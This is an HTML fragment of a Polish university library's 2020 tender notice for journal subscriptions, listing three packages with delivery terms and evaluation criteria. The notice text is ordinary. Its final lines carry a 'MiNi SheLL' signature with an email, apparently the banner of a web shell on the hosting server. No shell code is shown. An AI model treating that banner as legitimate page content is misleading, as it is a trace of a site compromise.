Pakiet I - 12 zadań częściowych. 2. Pakiet II - 5 zadań częściowych.3. Pakiet III - 231 zadań częściowych. Zamawiający informuje, że do każdego zadania częściowego, w każdym pakiecie, obowiązują te same kryteria oceny ofert (cena oraz termin reklamacji). Ponadto termin realizacji zamówienia jest taki sam dla wszystkich zadań częściowych w każdym pakiecie (01.01.2020 - 31.12.2020)Ilekroć mowa o "Terminie reklamacji" (kryterium oceny ofert) należy przez to rozumieć termin rozpatrzenia reklamacji przez Wykonawcę (ilość dni kalendarzowych od daty złożenia reklamacji przez Zamawiającego)</span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Pakiet nr I. Dostawa naukowych czasopism zagranicznych, drukowanych do Biblioteki Głównej Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia: Naukowe czasopisma zagraniczne, drukowane, dostarczane w ramach Pakietu nr I tj. Zadania częściowe od 1 do 12. Wykonawca w ramach tego Pakietu może złożyć ofertę na dowolną liczbę zadań częściowych, z uwzględnieniem podziału na 12 zadań.2. Forma dostawy: prenumerata, regularna w miarę ukazywania się poszczególnych numerów każdego z tytułów czasopism objętych zamówieniem.3. Termin dostawy:1) czasopisma europejskie – najpóźniej do 21 dni kalendarzowych od daty publikacji,2) czasopisma amerykańskie i inne – najpóźniej do 28 dni kalendarzowych od daty publikacji.4. Dostawa prenumerowanych czasopism będzie odbywała się systemem skonsolidowanym, tzn. raz w tygodniu pocztą kurierską do siedziby Zamawiającego. Przesyłki muszą być dostarczone w następnym dniu roboczym po dniu ich nadania.5. Miejsce dostawy: Biblioteka Główna Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie, al. Mickiewicza 24/28, 30-059 Kraków. 6. Szczegółowy opis przedmiotu zamówienia dotyczący Pakietu nr I (12 zadań częściowych) znajduję się w SIWZ oraz w dołączonych do niej załącznikach (w szczególności we wzorze umowy oraz formularzu ofertowym).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>22200000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-01<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN REKLAMACJI</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Pakiet I podzielony jest na 12 zadań częściowych. <br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Pakiet nr II. Dostawa (udostępnienie) naukowych czasopism zagranicznych w wersji on-line dla Biblioteki Głównej Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia: Naukowe czasopisma zagraniczne, w wersji on-line, dostarczane (udostępniane) w ramach Pakietu nr II tj. Zadania częściowe od 1 do 5. Wykonawca w ramach tego Pakietu może złożyć ofertę na dowolną liczbę zadań częściowych, z uwzględnieniem podziału na 5 zadań.2. W przypadku prenumerowanych zagranicznych czasopism w wersji on-line Wykonawca zobowiązany jest:1) zapewnić dostęp on-line, do tych tytułów w terminie do 2 dni kalendarzowych od ukazania się ich pierwszych numerów w 2020 roku oraz do każdego numeru za rok 2020, który ukaże się po 31.12.2020 r.2) zapewnić wieczysty dostęp do zamawianego tytułu z roku prenumeraty,3) wyszczególnić w formularzu ofertowym, do których roczników archiwalnych Zamawiający ma dostęp on-line w roku prenumeraty (podać szczegółowy zakres czasowy np. „od VII 1999 do 2020 r.”) i do których zachowuje dostęp po zakończeniu roku prenumeraty.Uwaga: Wpisanie powyższych informacji w formularzu cenowym jest obowiązkowe, ale nie będzie przedmiotem oceny oferty.3. Szczegółowy opis przedmiotu zamówienia dotyczący Pakietu nr II (5 zadań częściowych) znajduję się w SIWZ oraz w dołączonych do niej załącznikach (w szczególności we wzorze umowy oraz formularzu ofertowym).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>22200000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-01<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN REKLAMACJI</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Pakiet II podzielony jest na 5 zadań częściowych. <br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Pakiet nr III. Dostawa czasopism polskich dla jednostek organizacyjnych Uniwersytetu Rolniczego im. Hugona Kołłątaja w Krakowie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Przedmiot zamówienia: Czasopisma polskie wymienione w Pakiecie nr III: w Zadaniach od 1 do 216 będą dostarczane w wersji papierowej, natomiast w Zadaniach od 217 do 231 będą dostarczane w wersji papierowej oraz będą posiadały dostęp on-line do zawartości czasopisma. 2. Zamawiający dopuszcza możliwość składania ofert częściowych, a Wykonawca może złożyć ofertę na dowolną liczbę zadań częściowych, z uwzględnieniem podziału zamówienia na 231 Zadań.3. Forma dostawy: prenumerata, regularna, w miarę ukazywania się poszczególnych numerów każdego tytułów czasopism objętych zamówieniem. 4. Termin dostarczania czasopism:1)	dwutygodniki, miesięczniki, kwartalniki, półroczniki i roczniki – do 7 dni od dat ich wydania,2)	prasa codzienna i tygodniki będą dostarczane w dniu ich ukazania się:a)	w dni powszednie: od poniedziałku do piątku w godzinach wczesnorannych i winna być zakończona przed godz. 8:00,b)	wydania sobotnio-niedzielne będą dostarczane w poniedziałki. 5. Czasopisma w wersji drukowanej winny zawierać wszelkie dołączane do nich dodatki, jeżeli są one wliczone w cenę. Jeżeli Wykonawca otrzymał od wydawcy wraz z zamawianymi egzemplarzami prasy w formie papierowej bezpłatne dodatki (np. książki, płyty CD, DVD), to Wykonawca zobowiązany jest dostarczyć Zamawiającemu egzemplarze czasopisma z tymi bezpłatnymi dodatkami.6. Miejsce dostawy: jednostki organizacyjne Zamawiającego wymienione w Załączniku do SIWZ. 7. Szczegółowy opis przedmiotu zamówienia dotyczący Pakietu nr III (231 zadań częściowych) znajduję się w SIWZ oraz w dołączonych do niej załącznikach (w szczególności we wzorze umowy oraz formularzu ofertowym).<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>22200000-2, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: 2020-01-01<br/>data zakończenia: 2020-12-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">90,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">TERMIN REKLAMACJI</td><td style="border: 1px solid black;border-collapse: collapse;">10,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Pakiet III podzielony jest na 231 zadań częściowych. <br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com